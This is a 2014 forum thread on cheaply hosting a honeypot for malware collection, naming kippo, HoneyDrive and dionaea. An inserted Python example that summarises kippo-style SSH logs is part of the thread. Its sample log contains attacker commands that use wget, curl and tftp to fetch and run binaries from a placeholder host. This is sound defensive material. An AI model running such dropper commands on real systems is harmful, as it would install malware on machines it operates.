Good place to run a honeypot?
I'd like to run a honeypot primarily for malware collection. I'd need a server powerful enough to run Xubuntu in a VM (which itself will not be headless). If I could install the Xubuntu ISO on the server directly, that would be even better. I'm just getting into the area, so I don't plan to spend much money on it.

Comments

  • Kimsufi?

  • Out of curiosity, I've always wanted to do some malware analysis and collection. What tools do you use and what do you need to learn?

    /offtopic

  • Vultr allows custom ISOs

  • gestiondbi (Member, Patron Provider)

    @hostnoob said:
    Vultr allows custom ISOs

    Yes, but not sure they allow malware on their nodes...

  • rds100 (Member)
    edited October 2014

    davidgestiondbi said: Yes, but not sure they allow malware on their nodes...

    Malware detection is not malware ;-)
    For instance, there is a fake SSH daemon: when some brute forcer connects to it, it pretends he can log in and then starts logging the commands he tries to execute.

    Thanked by aglodek
  • Please do share your findings/statistics with LET if you succeed.

  • @honeyme Is it a custom ISO you've created or a distro you've downloaded from somewhere? It's an interesting idea.

  • BrianHarrison (Member, Patron Provider)

    Sounds like you'd be better served with a dedicated server -- attracting malware on a VM node won't make your host happy :-)

    Thanked by gestiondbi
  • @BrianHarrison said: Sounds like you'd be better served with a dedicated server -- attracting malware on a VM node won't make your host happy :-)

    A honeypot is not attracting anything; rather, it is reading hackers' automated scripts as they attempt to execute commands in a fake, controlled environment where they can't do any damage.

    @krs360 said: Is it a custom ISO you've created or a distro you've downloaded from somewhere? It's an interesting idea.

    @honeyme: I agree. Where to get this?

  • @aglodek I have one of those 1.99 euro kimsufi boxes which is doing nothing at the moment, it was used as a mail server but that's going through Google Apps nowadays.

    Thought a little honeypot would be an interesting project.

  • aglodek (Member)
    edited October 2014

    @krs360 said: aglodek I have one of those 1.99 euro kimsufi boxes which is doing nothing at the moment, it was used as a mail server but that's going through Google Apps nowadays.
    Thought a little honeypot would be an interesting project.

    Thanks, but I meant where to get the software, like the fake ssh app etc... I'd like to check this out myself, too.

  • krs360 (Member)
    edited October 2014

    @aglodek That's what I was getting at, would be good if there was a custom iso, etc. If you do find anything of interest - let me know..

  • Google kippo for the fake SSH. There's a fork (on GitHub, I think) which can handle SFTP as well.
    Though it's not THAT interesting, because all you will see is Chinese bots trying to upload all sorts of trojans all day long!

    Thanked by aglodek, Mark_R
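The two posts above describe what a fake SSH daemon like kippo actually gives you: a log of credential guesses, a pretend-successful login, and then every command the bot types, most of which are attempts to pull down a binary. The following is an added example, not code from the thread or from the kippo project, showing how to turn that log into the two things a malware-collection honeypot cares about: the credentials the bots guess most, and the download URLs to go fetch the samples from. The log lines are constructed to resemble kippo's format; the exact layout of a real kippo install may differ, so the regexes are an assumption to adjust against your own kippo.log.

```python
"""Summarise kippo-style SSH honeypot logs: who logged in with what, and what they tried to download.

Added example (not from the thread or from kippo). Log format is assumed from
memory of kippo's output; treat LINE_RE/LOGIN_RE/CMD_RE as a starting point.
"""
import re
from collections import Counter

# Constructed sample lines in kippo's style. Not real captures; IPs are RFC 5737 test ranges.
SAMPLE_LOG = """\
2014-10-22 15:46:26+0200 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.7] login attempt [root/123456] failed
2014-10-22 15:46:29+0200 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.7] login attempt [root/password] succeeded
2014-10-22 15:46:31+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.7] CMD: cd /tmp; wget http://198.51.100.9/bins/x86.bin -O .x; chmod +x .x; ./.x
2014-10-22 15:46:33+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.7] CMD: uname -a
2014-10-22 16:02:08+0200 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.200] login attempt [root/123456] failed
2014-10-22 16:02:10+0200 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.200] login attempt [admin/admin] failed
2014-10-22 16:02:12+0200 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.200] login attempt [admin/1234] succeeded
2014-10-22 16:02:14+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,198.51.100.200] CMD: curl -O http://198.51.100.9/bins/arm7.bin; tftp 198.51.100.9 -c get tftp1.sh
"""

# The attacker IP is the last comma-separated field inside the first [...] block.
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) \[(?P<svc>[^\]]*),(?P<ip>[0-9a-fA-F.:]+)\] (?P<msg>.*)$")
LOGIN_RE = re.compile(r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)")
CMD_RE = re.compile(r"CMD: (?P<cmd>.*)")
# Download URLs embedded in the typed command; stop at shell separators.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s;'\"|&<>]+")
# tftp "get" is a common second-stage downloader; normalise it to a pseudo-URL.
TFTP_RE = re.compile(r"tftp\s+(?P<host>\S+)\s+-c\s+get\s+(?P<file>\S+)")


def parse_log(text):
    """Group the log by attacker IP: credential attempts, successes, commands, download URLs."""
    sources = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log noise (startup messages, disconnects, ...)
        entry = sources.setdefault(
            m.group("ip"), {"attempts": [], "successes": [], "commands": [], "urls": []}
        )
        msg = m.group("msg")
        lm = LOGIN_RE.search(msg)
        if lm:
            cred = (lm.group("user"), lm.group("pw"))
            entry["attempts"].append(cred)
            if lm.group("result") == "succeeded":
                entry["successes"].append(cred)
            continue
        cm = CMD_RE.search(msg)
        if cm:
            cmd = cm.group("cmd")
            entry["commands"].append(cmd)
            entry["urls"].extend(URL_RE.findall(cmd))
            for tm in TFTP_RE.finditer(cmd):
                entry["urls"].append(f"tftp://{tm.group('host')}/{tm.group('file')}")
    return sources


def top_credentials(sources, n=5):
    """Most-guessed (user, password) pairs across all attackers."""
    counts = Counter()
    for entry in sources.values():
        counts.update(entry["attempts"])
    return counts.most_common(n)


def download_urls(sources):
    """Deduplicated download URLs in first-seen order: the worklist for a sample fetcher."""
    seen = []
    for entry in sources.values():
        for url in entry["urls"]:
            if url not in seen:
                seen.append(url)
    return seen


if __name__ == "__main__":
    summary = parse_log(SAMPLE_LOG)
    for ip, entry in summary.items():
        print(f"{ip}: {len(entry['attempts'])} guesses, logged in as {entry['successes']}")
        for cmd in entry["commands"]:
            print(f"    CMD {cmd}")
    print("top credentials:", top_credentials(summary))
    print("samples to fetch:", download_urls(summary))
```

Fetch the URLs from a throwaway box or a sandboxed fetcher, never from the honeypot's own network identity, and hash each sample before storing it so repeated drops of the same binary collapse into one file.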
  • honeyme (Member)
    edited October 2014

    Hey Guys, sorry for the delayed reply.

    @0xdragon said:
    Out of curiosity, I've always wanted to do some malware analysis and collection. What tools do you use and what do you need to learn?

    /offtopic

    Practical Malware Analysis is a really wonderful introduction to malware analysis. It comes with many samples and guides you through dissecting them using a range of freely available tools.
    http://www.amazon.com/Practical-Malware-Analysis-Dissecting-Malicious/dp/1593272901

    @krs360 said:
    honeyme Is it a custom ISO you've created or a distro you've downloaded from somewhere? It's an interesting idea.

    I'm specifically looking at HoneyDrive, a custom Linux distro that comes with many honeypots.
    http://bruteforce.gr/honeydrive

    There are different kinds of honeypots; I think I'd really just be interested in running dionaea, which emulates a host of services, sufficient to be able to grab the malware from incoming attacks.
    http://dionaea.carnivore.it/
